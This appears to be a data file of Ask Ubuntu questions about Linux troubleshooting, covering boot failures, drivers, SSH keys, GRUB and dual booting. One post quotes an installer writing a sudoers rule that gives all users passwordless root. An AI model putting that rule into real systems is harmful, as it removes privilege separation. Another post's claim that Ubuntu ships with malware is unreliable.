394277	black screen after startup	i have a ubuntu gnome 13.10 installed on my laptop . ( almost ) everything worked fine , until yesterday , when after booting it up i got greeted by a black/blank screen . i 've got a futjisu s761 laptop with intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz , which means ( i believe ) , that my graphics card is intel hd graphics 3000 . what i did before : as far as i remember , all i did was installing the new font rendering packages as stated in the accepted answer in ugly fonts in java applications and did an apt-get upgrade . the details : grub works fine . i can select the os from there with no problem . os seems booting properly . i can see the `` bios kvm disabled '' message , or something along these lines . it 's always been there . if i remove the `` splash '' option from grub , there are no errors thrown at the startup . then i can see the gdm splash screen -- the foot with the three dots . after the first dot lights up , it goes straight to the blank screen . it does n't turn off , because i can see it 's lit up . i can go to single-user mode by pressing alt+ctrl+f1 . i can startx after logging in . everything works fine after that ( including suspend and hibernate ) . tried all troubleshooting options in xdiagnose without success . looked into xorg.0.log , saw nothing interesting . i do n't know what can be wrong , i have never encountered such a problem in any of the linux distros i 've tried on my laptop . here 's the xorg.0.log : http : //pastebin.com/l5c2hqvn cheers , k
394279	how to do rsyslog server configuration ?	i have one rsyslog server and 3 client server . i can send client log to remote server . but all the client logs are located in a single folder . so how can i create 3 client directory in remote server and how to send their own logs to their own file . am using ubuntu 12.04 server .
394280	executing pdftk with php exec on ubuntu 12.04.3	exec ( `` cd /var/www & & path= $ path : /usr/bin/ pdftk 1.pdf 2.pdf 3.pdf 4.pdf output final.pdf '' ) ; i 'm trying to execute this command on ubuntu 12.04.3 , it 's working fine when i 'm connecting via ssh , but it does n't work when i 'm executing it with php giving `` unable to fork the current command '' , any idea what to do ?
394281	how can i search info and properties on a drive ?	how can i easy find info and properties on a drive in the pc ( or usb linked ) ? basically in windows you can use right click on the mouse and find the properties ...
394282	drag and drop items from folder to applications	i have been a window user since sometime back and lack of knowledge is irritating me like anything ... .i checked these thread before posting this question : drag & drop files and items in unity ! | drag and drop across ( fullscreen ) applications , switching via alt-tab there must be some windows equivalent feature to linux in which i can drag items and drop it to some application . for e.g : drop an item from a folder to my compose mail as attachment in gmail via launcher ( as in windows ) . add songs to existing play-list in rhythmbox sorry for sounding like a noob but i really do n't know where to start at ! ! currently m using ubuntu 12.04.3 lts ... .
394283	how to force ubuntu to discover external monitor on laptop with via chipset ?	if i use my old msi laptop at home , i connect it to external monitor , mouse and keyboard via kvm switch . when system starts with external monitor connected , everything usualy works fine , but if i forget to plug vga jack into notebook in time ( or wake notebook , previously booted without monitor connected ) screen remains black until reboot . but if laptop was suspended aware of external monitor , it remembers this fact even if i resume/suspend it several times without connection . it 's msi vr321x with via chipset ( driver `` via '' in xorg.conf ) , external monitor shows the same picture as main screen with same resolution ( it 's not even mentioned in `` monitors '' ) . i suspect , there should be an option to activate external interface after startup , but i have n't enough luck to find it .
394286	how to install themes in grub 2 v 1.99 ?	i 'd like to install themes in ubuntu 13.10 grub2 bootloader , is that possible ? in the new version of grub customizer 4 , there is `` theme '' button , when i press it , it ask me to open a theme file . are there themes for grub 2 ? ? what is the extension of these themes ? ? from where i can download these themes ? thank you in advance .
394287	dashed borders of my window manager ( xfce ) - solution	i ran into the same problem as posted here dashed borders of my window manager ( xfce ) i now found a solution but am not able to aswer due to my newbie state . i found out that the problem only exists on my intel video laptops ( nvidia was fine ) and occured only with themes having window borders with more than 1px width . my solution was to create a file /usr/share/x11/xorg.conf.d/20-intel.conf with the content : section `` device '' identifier `` intel graphics '' driver `` intel '' option `` accelmethod '' `` uxa '' endsection this switches off sandy bridge acceleration and turns back to slower but reliable uxa acceleration .
394288	new install of mythbuntu 12.04.3 disk size reported only 500gb but is 4tb	trying to install mythbuntu 64bit to new seagate 4tb drive . the install only reports drive as 500 gb ? also if i let the install do auto install it fails at installing the grub . it seemed to work when i created two partitions but then does n't boot into mythtv when restarted . what am i doing wrong ? is there a guide on the install itself for noobs ? have xtreamer ultra 2 which had older version but hard disk failed . thanks , hugh
394290	skyrim lagging bad on 12.04	i recently installed skyrim , and when i run the program , i have a bit of an issue . the launcher loads great , and have had no problems with it . however , after i push play , and skyrim loads , it starts to lag . the main menu is alright , with a slight lag , but i expected that . when i start a new game , it takes at least 4 minutes to load to the opening cut-scene , and when it does , it is lagging horribly . i let it play through to see what the outcome would be , and it got to the point where the audio was at the character creation , but the video was still on the carriage ride . every bit of the game is laggy , even the start menu . i dont know what could be causing this . i have a sony vaio vgn-cs390jcr 4gb ram 500 gb hard drive as for video card , i wasnt sure so this is what terminal says ... keegan @ thepos : ~ $ sudo lshw -c video [ sudo ] password for keegan : *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : d0000000-d03fffff memory : c0000000-cfffffff ioport:60f0 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : d3400000-d34fffff
394291	can i install ubuntu and then recover files ?	currently i have windows 7 installed on a 1 tb hard drive . i was wondering whether i could partition my hard drive so that i could have a partition a ( 800 gb - empty and unnecessary files ) and partition b ( 200 - stuff i intend to keep after i install ubuntu ) . so that i could install ubuntu and have it format partition a . then once i have installed ubuntu ( 13.10 64-bit ) i would like to transfer the files from partition b to new partition a ( the one which i have installed ubuntu over windows ) and delete partition b and expand partition a to take up all of partition b and become only a single partition . so i want to know if it is possible ?
394292	xserver-xorg-core update failed . not fully installed or removed	i tried to update xserver by downloading xserver-xorg-core_1.14.5-1ubuntu2_amd64.deb from packages.ubuntu.com , and when i tried to install it it said : ( reading database ... 266118 files and directories currently installed . ) preparing to replace xserver-xorg-core 2:1.14.4.901+git20131203+server-1.14-branch.c30db601-0ubuntu0sarvatt4 ( using xserver-xorg-core_1.14.5-1ubuntu2_amd64.deb ) ... unpacking replacement xserver-xorg-core ... dpkg : dependency problems prevent configuration of xserver-xorg-core : xserver-xorg-core depends on xserver-common ( > = 2:1.14.5-1ubuntu2 ) ; however : version of xserver-common on system is 2:1.14.4.901+git20131203+server-1.14-branch.c30db601-0ubuntu0sarvatt4 . xserver-xorg-core depends on libgcrypt11 ( > = 1.5.1 ) ; however : version of libgcrypt11 : amd64 on system is 1.5.0-3ubuntu3 . dpkg : error processing xserver-xorg-core ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... errors were encountered while processing : xserver-xorg-core now whenever i try to upgrade or install something it says : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : xserver-xorg-core : depends : xserver-common ( > = 2:1.14.5-1ubuntu2 ) but 2:1.14.4.901+git20131203+server-1.14-branch.c30db601-0ubuntu0sarvatt4 is to be installed depends : libgcrypt11 ( > = 1.5.1 ) but 1.5.0-3ubuntu3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i do sudo apt-get -f install it says : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : ubuntu-desktop xorg xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-all xserver-xorg-video-ati xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-modesetting xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-s3 xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-vesa xserver-xorg-video-vmware 0 upgraded , 0 newly installed , 33 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 13,0 mb disk space will be freed . how to fix this issue ? please help me , i do n't know what to do .
394294	ubuntu installation on i5-2430m possible ?	i want to install ubuntu 13.10 in my virtualbox . when i try it with the 64-bit version , i get this error : this kernel requires an x86-64 cpu , but only detected an i686 cpu ii have an intel core i5-2430m . as far as i know , it 's an 64-bit cpu , and i tried it with the 32-bit version and got this error : this kernel requires the following features not present on the cpu : pae so what should i do now to make it run ? thank you
394296	how to install mpfr-3.1.2 in ubuntu 13.04	i have ubuntu 13.04 with processor `` intel® core™2 duo cpu e8400 @ 3.00ghz × 2 `` i m trying to install mpfr-3.1.2 but the error is coming . `` error ! the versions of gmp.h ( 5.1.3 ) and libgmp ( 5.0.5 ) do not match . '' in make command also it is showing this as warning . how to resolve it ?
394297	ubuntu 12.04 shows rtl8188 ubstead 8192 is that normal ? problem with wifi	i have wifi asus pce-n15 with 8192ce driver inside . when i type : lspci | less i receive : 05:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) is that normal ? i have also a problem that connection disappeared after some time . i read all recipes about that but i am not able to compile drivers i receive : 1_0006.0514.2012 $ sudo make [ sudo ] password for ivo : make -c /lib/modules/3.8.0-34-generic/build m=/home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-34-generic' cc [ m ] /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o in file included from /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:39:0 : /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/pci.h:245:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_action_proc’ : /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:870:25 : error : ‘rx_flag_mactime_mpdu’ undeclared ( first use in this function ) /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:870:25 : note : each undeclared identifier is reported only once for each function it appears in /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_send_smps_action’ : /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:1432:16 : error : ‘struct < anonymous > ’ has no member named ‘sta’ make [ 2 ] : *** [ /home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/ivo/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-34-generic' make : *** [ all ] error 2 ivo @ ivoubuntutest : ~/project/wirelesstest/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 $ i installed already all additional packages as in other threads here . how to solve this ?
394299	unable to install mobilepartner dashboard for tata photon plus	i have been trying for many days to install tata photon plus in my ubuntu 12.04 and mint 13 without any success . finally i was able to use usb_modeswitch to detect the data card in network manager . since then , i have been able to access the internet . but i have not been able to install mobilepartner . here is the output when i follow the instructions in 'readme.txt ' : installed version : 21.005.22.05.628 installing version : 21.005.22.05.628 the software is exist . do you want overwrite it ? ( [ y ] /n ) : y local path is : /usr/local/mobile_partner installing photon plus ... chmod : can not access `/usr/local/mobile_partner/config ' : no such file or directory chmod : can not access `./driver/* ' : no such file or directory ./install : line 479 : ./driver/install : no such file or directory chmod : can not access `./sbin/* ' : no such file or directory chmod : can not access `./hw_pppd ' : no such file or directory chmod : can not access `./hw_pppd ' : no such file or directory ./install : line 495 : ./hw_pppd/sbin/install_pppd : no such file or directory cp : can not stat `./hw_pppd ' : no such file or directory cp : can not stat `/usr/local/mobile_partner/qtlib/lib*.so* ' : no such file or directory cp : can not stat `/usr/local/mobile_partner/sbin/67hw_hook ' : no such file or directory chmod : can not access `/etc/pm/sleep.d/67hw_hook ' : no such file or directory [ done ] finished , press any key to exit can anyone help me with this ? the question : how to install mobile partner 21 for ubuntu does tell how to install it , but it does n't work for me . update 1 - my installation steps the local folder is : /usr/local/mobile_partner the photon plus is in my home documents folder . i run sudo ./install in : /home/name/documents/photon plus/linux after running the above command , the program explicitly adds : all all= ( all ) nopasswd : all all all= ( all ) nopasswd : all all all= ( all ) nopasswd : all to my /etc/sudoers file . i manually remove those lines every time .
394301	facebook crashed then chromium wont start ?	i ca n't start chromium anymore try to write this at terminal chromium-browser and i had got error /usr/lib/chromium-browser/chromium-browser : symbol lookup error : /usr/lib/chromium-browser/libs/libnet.so : undefined symbol : _zn3net12websogketjob14savenextcookieev i want to backup chromium settings , how can i solve it ? without lose ( saved usernames , bookmarks , .. etc ) i read many another questions and answers and ca n't solve this problem .
394302	do i need a bootable usb drive to install ubuntu ?	and if you do , how much space should i partition for it ? can i just install it to my laptop ? i have so many questions ! i 'm a newbie to linux : d by the way , i 'm running windows 8 on a lenovo ideapad .
394305	public key authentication failed	i am using ubuntu 13.10 , and the server runs ubuntu 12.04 . i had generate private and public keys using ssh-keygen , and put id_rsa.pub to server side and added it to authorzied_keys accordding to the method i found on the internet . but , i still have to input password while i am trying to login . i have set the home dir to 700 , .ssh dir to 700 , authorzied_keys file to 600 , and i have checke sshd_config file , and nothing happened . the debug infomation ( with -vvv option ) and sshd_config is as following , and nothing listed in server 's auth.log file . i even have updated openssh-server openssh-client on both client and server side . is there anything else i have to do ? thanks for any infomation . debug3 : load_hostkeys : loading entries for host `` [ xxx.101.15.62 ] :2222 '' from file `` /home/leetom/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/leetom/.ssh/known_hosts:2 debug3 : load_hostkeys : loaded 1 keys debug3 : load_hostkeys : loading entries for host `` [ xxx.101.15.62 ] :2222 '' from file `` /home/leetom/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/leetom/.ssh/known_hosts:2 debug3 : load_hostkeys : loaded 1 keys debug1 : host ' [ xxx.101.15.62 ] :2222 ' is known and matches the ecdsa host key . debug1 : found key in /home/leetom/.ssh/known_hosts:2 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/leetom/.ssh/id_rsa ( ( nil ) ) , debug2 : key : /home/leetom/.ssh/id_dsa ( ( nil ) ) , debug2 : key : /home/leetom/.ssh/id_ecdsa ( ( nil ) ) , debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : trying private key : /home/leetom/.ssh/id_rsa debug1 : read pem private key done : type rsa debug3 : sign_and_send_pubkey : rsa 68:51 : b6 : ed : cc : c2:54 : f4 : xx:15:41 : d7 : f5:4a:0e : da debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/leetom/.ssh/id_dsa debug3 : no such identity : /home/leetom/.ssh/id_dsa : no such file or directory debug1 : trying private key : /home/leetom/.ssh/id_ecdsa debug3 : no such identity : /home/leetom/.ssh/id_ecdsa : no such file or directory debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password leetom @ xxx.101.15.62 's password : and the sshd_config # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords # passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes
394313	neither control key is not registered with anthy installed	i have a very annoying problem with a fresh ubuntu 13.10 install . for some reason control keys usually do not register . there seem to be no event given by xev . by usual , i mean most of the time . sometimes for some time they both work for a minute , and then again they stop working . i have an asus ux31a laptop , bought in japan , so it has a japanese layout . i sometimes type japanese , so i need anthy installed , and i 'm wondering is somehow that is at fault now . in language input , i have selected default as the `` keyboard input method system '' ( as instructed in here : input methods after upgrade to 13.10 ) , i have also tried ibus , but i did not see the difference . in text entry , i have 2 input sources configured currently , japanese , and japanese ( anthy ) , japanese being the primary one . usually i have my native language setup as well , but currently no , i want to find the culprit first . when control keys work , xev shows the codes to be : jlumme @ zenbk : ~ $ xev | grep -i keypress -a2 keypress event , serial 40 , synthetic no , window 0x5000001 , root 0x9d , subw 0x0 , time 15177433 , ( 94,113 ) , root : ( 1002,921 ) , state 0x0 , keycode 37 ( keysym 0xffe3 , control_l ) , same_screen yes , -- keypress event , serial 40 , synthetic no , window 0x5000001 , root 0x9d , subw 0x0 , time 15181339 , ( 94,113 ) , root : ( 1002,921 ) , state 0x0 , keycode 105 ( keysym 0xffe4 , control_r ) , same_screen yes , xmodmap shows : jlumme @ zenbk : ~ $ xmodmap -pke | grep 37 keycode 37 = control_l nosymbol control_l jlumme @ zenbk : ~ $ xmodmap -pke | grep 105 keycode 105 = control_r nosymbol control_r what puzzles me is that it is seemingly random when it works and when it does n't , i 'm happily browsing the web , and able to shortcuts to open new tabs and close , until i do n't , without any kind of clear indication as to what triggered the change . it does n't have to be the browser , it can be any text editor as well , same thing . in gnome-tweak-tool i have disabled the control-key-position setting , also i have tried to force it to bottom left , but no help .
394314	error : system settings 's white became transparent	i tried to update the gnome to version 3.10 , but it cause many error , so i uninstalled the updates . everything is fine now , but in the gui programs , the white background is now transparent . do you know how to fix that ?
394315	restore remote addressbook from backup	i 'm running my own cloud at home to sync contacts and calendars . to backup my workstation , running ubuntu 13.10 , i 've used the pre-installed dăšjă dup . unfortunately , setting up my new mobile phone , all my contacts where accidentally removed from the sever and hence from the other clients as well . is there a way to restore , using my backup on my workstation , my contacts ? i 'm not sure if thunderbird ( 24.2.0 ) store the remote address book somewhere .
394321	what sort of encryption is used ?	what encryption is used in a default ubuntu full hard drive encryption and is it possible to specify another ?
394323	live system boots into initramfs shell	i 'm trying to install kubuntu saucy x86 on a rather old computer from an usb stick ( usb legacy emulation enabled ) i also tried to boot ubuntu raring from dvd but getting the same problem : the system boots into the setup menu ( something like this : ) kubuntu 13.10 start kubuntu check disk for issues test memory boot from first hard disk when hitting enter on start kubuntu , the plymouth boot animation shows up , but when i hit esc , i only see lots of something like these : /init line 7 : ca n't open /dev/sr0 : no medium found after a minute or so i get into the initramfs shell with the notification that no medium containing a live file system was found . as i said , this happens both from dvd and usb . i 've used both media to install ( k ) ubuntu on other systems and did n't change anything on that stick . the installed windows xp boots without problems . please help me to get kubuntu running on this computer .
394325	my wacom tablet works , as in it is useable as a mouse , however is not detected by anything on my computer ?	my bamboo tablet is connected to my computer by usb . it can be used as a mouse , i.e . it can move across the screen and click things . it can draw in painting/image software fine , but when i want it to use the properties it should have , i.e . pressure sensitivity , etc to make lines thicker , etc , i have to go into preferences or settings , etc . to find the wacom tablet to edit the settings in the program . but even though the tablet is plugged in , no program can detect it ? if i go to my computer , it does n't even show up there . what do i do so my computer detects the tablet ? ?
394326	bootable flash drive ubuntu install	just to ask if the method shown here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows allows a computer to be installed with 64-bit ubuntu . i have installed ubuntu on one of my computers , however it only installed 32-bit ubuntu . ( the computer has 4gb ram ) thanks .
394332	native ipv6 setup	i got following information from my provider : range : 2a00:1630:2:801 : :/64 gateway : 2a00:1630:2:800 : :1 netmask : /56 my config file : iface eth0 inet6 static address netmask 56 gateway 2a00:1630:2:800 : :1 dns-nameservers 2620:0 : ccc : :2 up ip -6 addr add 2a00:1630:2:801 : :/64 dev eth0 are these settings correct and what do i have to put at address ? also what does the netmask 56 mean ?
394333	ubuntu boots to the blank screen with a cursor	i recently upgraded to ubuntu 12.10 . i did this last night . this morning when i tried to turn my computer on , he boots to a blank black screen with a little underscore cursor . i can boot to a terminal in recovery mode , but i can not boot to the unity desktop . how can i fix this ?
394334	functional ubuntu-touch lock screen	is a functional lock screen ( e.g . pin or password ) for ubuntu touch being developed ? the nearest thing i could find was a design mockup from july with a hardcoded password http : //design.canonical.com/2013/07/unlocking-the-phone/ the os seems to be shaping up nicely and i 'd love to be able to test it in the real world but i ca n't until it has this feature .
394337	unable to unzip tar.gz in ubuntu ?	i want to unzip tar.gz in terminal . i do n't want to use any application from ubuntu sofware center .
394340	must i format my usb disk even if it is already fat32 ?	i am learning django ( a high-level python web framework ) . and i am interested in ubuntu . my os is win8 and i decide to create a bootable usb stick with the tool pen drive linux 's usb . i already have a fat32 usb disk . there are already some files in it and 10 gb space left . here are the questions : 1.is ubuntu 12.04 better than win8 in web development ? 2.could i install ubuntu alongside the existing files in my usb disk ? 3.is formatting usb disk before installing better than not formatting it ? thank you !
394342	how can i run xampp on ubuntu ?	i have installed xampp onubuntu 13.04` and its running but i do n't know where to run it next time , there was no shortcut created on desktop . so how can i run it when i use my computer again after shutdown ?
394345	ssh doesnot work with wifi but work fine with wired connection	i have ubuntu 13.10 . i use ssh to connect to a remote computer in the university using ssh xxxx @ ws.hpc.unipg.it . it is working fine when i am using wired connection but when i try to connect through wifi using the same command it doesnât work and gives me this error : ssh : connect to host ws.hpc.unipg.it port 22 : no route to host i hope that someone can help me .
394346	is ubuntu really full of malware ?	i installed ubuntu 12.04 into a vm with wm player . open firefox and just leave it at the google homepage . i get continuous warnings from malewarebytes the windows 7 operating system that a malicious site is trying to open a website on my host computer using vmnat.exe . i look up the ip of websites that are trying to open and they are in eastern europe . this is a fresh install that has never visited a website other then the google homepage . ubuntu appears to come pre-loaded with viruses that will infect the windows operating system of the computer they are operating on . what is going on ?
394350	must i seperate a new disk before installing ubuntu 12.04.3 alongside windows 8 ?	hello , must i seperate a new disk before installing ubuntu 12.04.3 alongside windows 8 ? also , there is only one ntfs disk named c in my computer and windows 8 is already on it . is it possible for me to install ubuntu 12.04.3 alongside windows 8 in the same disk c ? that is to say , i do n't want to seperate a new disk from c .
394352	refind no longer running on dual boot macbook pro	dual boot on macbook pro 9,2 osx 10,9,1 and ubuntu 13,10 after an unrelated upgrade ( to imovie on osx ) refind no longer opens on re boot and i have no options on which os to boot ? i tried to boot from the ubuntu 13,10 cd but it gets to a black screen and never runs the cd .
394353	nginx-extras do n't have upload module ?	when i use apt-get install nginx-extras and enter nginx -v , i can not find the upload module , who can deal with it ?
394355	error : unknown filesystem . grub rescue . insmod normal not working	i just installed ubuntu gnome 13.10 and after a reboot i got error : unknown filesystem . grub rescue . i have tried : set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal but i get an error at the last one i get this error : error : no such partition . i also tried to update grub from a live cd but when i enter : sudo mount /dev/sda5/mnt i get this : -mount : ca n't find /dev/sda5/mnt in etc/fstab or /etc/mtab . can someone help ?
394356	touchpad stops working in hp 4515s	sometimes it just stops working , usually when it 's busy , not always . i 'd like to get some code to reboot the touchpad , so i do n't have to restart the computer every time . maybe a driver that works or a permanent solution somehow . anybody on the know here ?
394361	ubuntu dual boot failure - alternative solution to using external device	i 'm running ubuntu and windows on my laptop . after doing some changes to the gpu driver ubuntu wo n't load . i understand the problem & i know which changes i have to make to which files , but i ca n't access ubuntu ( and therefore i ca n't see its file system and i ca n't change anything ) . i do n't have any external devices with me at the moment . is there a way of accessing ubuntu and making the required changes without them using : grub command line windows command line ( it 's ubuntu 13.04 and windows 7 ) .
394365	13.10 64bit install problem : kernel panic - not syncing	i 'm trying to install 13.10 64bit on my new laptop with a live cd , and i get the message : kernel panic - not syncing : attempted to kill init ! exitcode=0x00000100 drm_kms_helper : panic occured , switching back to text console only thing special with the laptop is that it has an ssd . any idea what i can try next ? any help would be appreciated .
394372	wifi not working on ubuntu 12.04 after upgrade from 10.04	after the upgrade from ubuntu 10.04 to ubuntu 12.04 , my system stopped working . i tried many many commands even then it did n't seem to work . it displayed : ubuntu is running in low graphics i could n't find any solutions on the internet . so i went into recovery mode and and cleaned my files and i worked for a whole month . i guess 12.04 is still running in low graphics as i can see from my eyes its really lame to see this 12.04 . now i knew that my system space was low so i cleared nearly 2 gb data . whenever i try to connect to my wifi it says authentication required by wifi network . i typed the password then it connects , but after 3 seconds the same message appears . repeating to authenticate did n't work . my wifi is working as i am posting this from my nexus from the same wifi to which 12.04 is now connecting . my laptop is a samsung rv510 . somebody please help me with the wifi problem .
394375	are my ports opened ?	im using virtual server on hosting . there is ubuntu 12.04 lts . im building pool websites , and stratum mining . i can connect to stratum on port 3333 via minerd on server , but cant connect from outside cpu miner , like mine . here is a list which i get when trying this command netstat -ntlp | grep listen : root @ vm9807 : ~ # netstat -ntlp | grep listen tcp 0 0 0.0.0.0:3334 0.0.0.0 : * listen 1757/python tcp 0 0 127.0.0.1:10025 0.0.0.0 : * listen 1219/master tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 987/mysqld tcp 0 0 0.0.0.0:587 0.0.0.0 : * listen 1219/master tcp 0 0 127.0.0.1:11211 0.0.0.0 : * listen 1121/memcached tcp 0 0 0.0.0.0:8332 0.0.0.0 : * listen 1721/python tcp 0 0 0.0.0.0:8333 0.0.0.0 : * listen 1757/python tcp 0 0 0.0.0.0:32333 0.0.0.0 : * listen 1686/betacoind tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen 969/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen 969/dovecot tcp 0 0 0.0.0.0:9333 0.0.0.0 : * listen 1678/litecoind tcp 0 0 31.31.75.108:53 0.0.0.0 : * listen 999/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 999/named tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 856/sshd tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen 1219/master tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen 999/named tcp 0 0 0.0.0.0:4190 0.0.0.0 : * listen 969/dovecot tcp 0 0 127.0.0.1:7777 0.0.0.0 : * listen 1117/python tcp 0 0 0.0.0.0:993 0.0.0.0 : * listen 969/dovecot tcp 0 0 0.0.0.0:995 0.0.0.0 : * listen 969/dovecot tcp 0 0 0.0.0.0:3333 0.0.0.0 : * listen 1721/python tcp6 0 0 : ::32332 : : : * listen 1686/betacoind tcp6 0 0 : ::32333 : : : * listen 1686/betacoind tcp6 0 0 : ::80 : : : * listen 1319/apache2 tcp6 0 0 : ::9333 : : : * listen 1678/litecoind tcp6 0 0 : ::53 : : : * listen 999/named tcp6 0 0 : ::9334 : : : * listen 1678/litecoind tcp6 0 0 : ::22 : : : * listen 856/sshd tcp6 0 0 : :1:953 : : : * listen 999/named root @ vm9807 : ~ # my vserver hosting is not blocking any ports , im not using any firewall . help me please thankx
394376	ubuntu 12.04 windows 7 home premium dual boot	i have a lenovo thinkpad edge laptop . i installed ubuntu desktop 12.04 but decided to dual-boot windows 7 home premium against my better judgement . ( league of legends performs poorly in wine ) . anyways , since installing windows i ca n't boot my ubuntu partition . all the searches i found were people losing their windows partition not linux . any help would be greatly appreciated .
